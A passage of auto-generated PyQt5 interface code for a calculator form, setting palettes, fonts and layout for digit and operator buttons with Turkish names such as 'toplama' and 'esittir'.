font.setItalic(False)
font.setUnderline(False)
font.setWeight(75)
font.setStrikeOut(False)
font.setKerning(True)
self.back.setFont(font)
self.back.setIconSize(QtCore.QSize(20, 20))
self.back.setShortcut("")
self.back.setCheckable(False)
self.back.setObjectName("back")
self.verticalLayout_4.addWidget(self.back)
self.nine = QtWidgets.QPushButton(Form)
self.nine.setMinimumSize(QtCore.QSize(0, 0))
self.nine.setMaximumSize(QtCore.QSize(16777215, 68))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(66, 120, 116))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Highlight, brush)
self.nine.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.nine.setFont(font)
self.nine.setStyleSheet("background-color: rgb(240, 240, 240);\n"
"selection-background-color: rgb(255, 255, 161);")
self.nine.setIconSize(QtCore.QSize(20, 20))
self.nine.setShortcut("")
self.nine.setCheckable(False)
self.nine.setObjectName("nine")
self.verticalLayout_4.addWidget(self.nine)
self.six = QtWidgets.QPushButton(Form)
self.six.setMinimumSize(QtCore.QSize(0, 0))
self.six.setMaximumSize(QtCore.QSize(16777215, 68))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(213, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(149, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(56, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(213, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(149, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(56, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(213, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(149, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(56, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(42, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(85, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.six.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.six.setFont(font)
self.six.setLayoutDirection(QtCore.Qt.LeftToRight)
self.six.setAutoFillBackground(False)
self.six.setStyleSheet("background-color: rgb(240, 240, 240);\n"
"selection-background-color: rgb(255, 255, 161);")
self.six.setIconSize(QtCore.QSize(20, 20))
self.six.setShortcut("")
self.six.setCheckable(False)
self.six.setObjectName("six")
self.verticalLayout_4.addWidget(self.six)
self.three = QtWidgets.QPushButton(Form)
self.three.setMinimumSize(QtCore.QSize(0, 0))
self.three.setMaximumSize(QtCore.QSize(16777215, 68))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 70, 70))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 31, 31))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(81, 111, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(160, 52, 52))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 25, 25))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.HighlightedText, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 27, 27))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(209, 222, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.NoRole, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 47, 47))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 70, 70))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 31, 31))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(81, 111, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(160, 52, 52))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 25, 25))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.HighlightedText, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 27, 27))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(209, 222, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.NoRole, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 47, 47))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 115, 43))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 70, 70))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 31, 31))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(112, 120, 36))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(160, 52, 52))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(81, 111, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 25, 25))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(81, 111, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 161))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Highlight, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 24, 8))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.HighlightedText, brush)
brush = QtGui.QBrush(QtGui.QColor(247, 27, 27))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(209, 222, 92))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.NoRole, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 47, 47))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.three.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.three.setFont(font)
self.three.setStyleSheet("background-color: rgb(240, 240, 240);\n"
"selection-background-color: rgb(255, 255, 161);")
self.three.setIconSize(QtCore.QSize(20, 20))
self.three.setShortcut("")
self.three.setCheckable(False)
self.three.setObjectName("three")
self.verticalLayout_4.addWidget(self.three)
self.virgul = QtWidgets.QPushButton(Form)
self.virgul.setMinimumSize(QtCore.QSize(0, 0))
self.virgul.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.virgul.setFont(font)
self.virgul.setIconSize(QtCore.QSize(20, 20))
self.virgul.setShortcut("")
self.virgul.setCheckable(False)
self.virgul.setObjectName("virgul")
self.verticalLayout_4.addWidget(self.virgul)
self.horizontalLayout.addLayout(self.verticalLayout_4)
self.verticalLayout_7 = QtWidgets.QVBoxLayout()
self.verticalLayout_7.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.verticalLayout_7.setSpacing(0)
self.verticalLayout_7.setObjectName("verticalLayout_7")
self.bolme = QtWidgets.QPushButton(Form)
self.bolme.setEnabled(True)
self.bolme.setMinimumSize(QtCore.QSize(0, 0))
self.bolme.setMaximumSize(QtCore.QSize(16777215, 68))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 21, 21))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 21, 21))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 21, 21))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
self.bolme.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.bolme.setFont(font)
self.bolme.setIconSize(QtCore.QSize(20, 20))
self.bolme.setShortcut("")
self.bolme.setCheckable(False)
self.bolme.setObjectName("bolme")
self.verticalLayout_7.addWidget(self.bolme)
self.carpma = QtWidgets.QPushButton(Form)
self.carpma.setEnabled(True)
self.carpma.setMinimumSize(QtCore.QSize(0, 0))
self.carpma.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.carpma.setFont(font)
self.carpma.setStyleSheet("")
self.carpma.setIconSize(QtCore.QSize(20, 20))
self.carpma.setShortcut("")
self.carpma.setCheckable(False)
self.carpma.setObjectName("carpma")
self.verticalLayout_7.addWidget(self.carpma)
self.cikarma = QtWidgets.QPushButton(Form)
self.cikarma.setMinimumSize(QtCore.QSize(0, 0))
self.cikarma.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.cikarma.setFont(font)
self.cikarma.setIconSize(QtCore.QSize(20, 20))
self.cikarma.setShortcut("")
self.cikarma.setCheckable(False)
self.cikarma.setObjectName("cikarma")
self.verticalLayout_7.addWidget(self.cikarma)
self.toplama = QtWidgets.QPushButton(Form)
self.toplama.setMinimumSize(QtCore.QSize(0, 0))
self.toplama.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.toplama.setFont(font)
self.toplama.setIconSize(QtCore.QSize(20, 20))
self.toplama.setShortcut("")
self.toplama.setCheckable(False)
self.toplama.setObjectName("toplama")
self.verticalLayout_7.addWidget(self.toplama)
self.esittir = QtWidgets.QPushButton(Form)
self.esittir.setMinimumSize(QtCore.QSize(0, 0))
self.esittir.setMaximumSize(QtCore.QSize(16777215, 68))
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(False)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(50)
font.setStrikeOut(False)
font.setKerning(True)
self.esittir.setFont(font)
self.esittir.setIconSize(QtCore.QSize(20, 20))
self.esittir.setShortcut("")
self.esittir.setCheckable(False)
self.esittir.setObjectName("esittir")
self.verticalLayout_7.addWidget(self.esittir)
self.horizontalLayout.addLayout(self.verticalLayout_7)
self.verticalLayout_5.addLayout(self.horizontalLayout)
self.verticalLayout.addLayout(self.verticalLayout_5)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
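    # Sets all user-visible strings (window title, button labels, tooltips); called from setupUi above.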
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
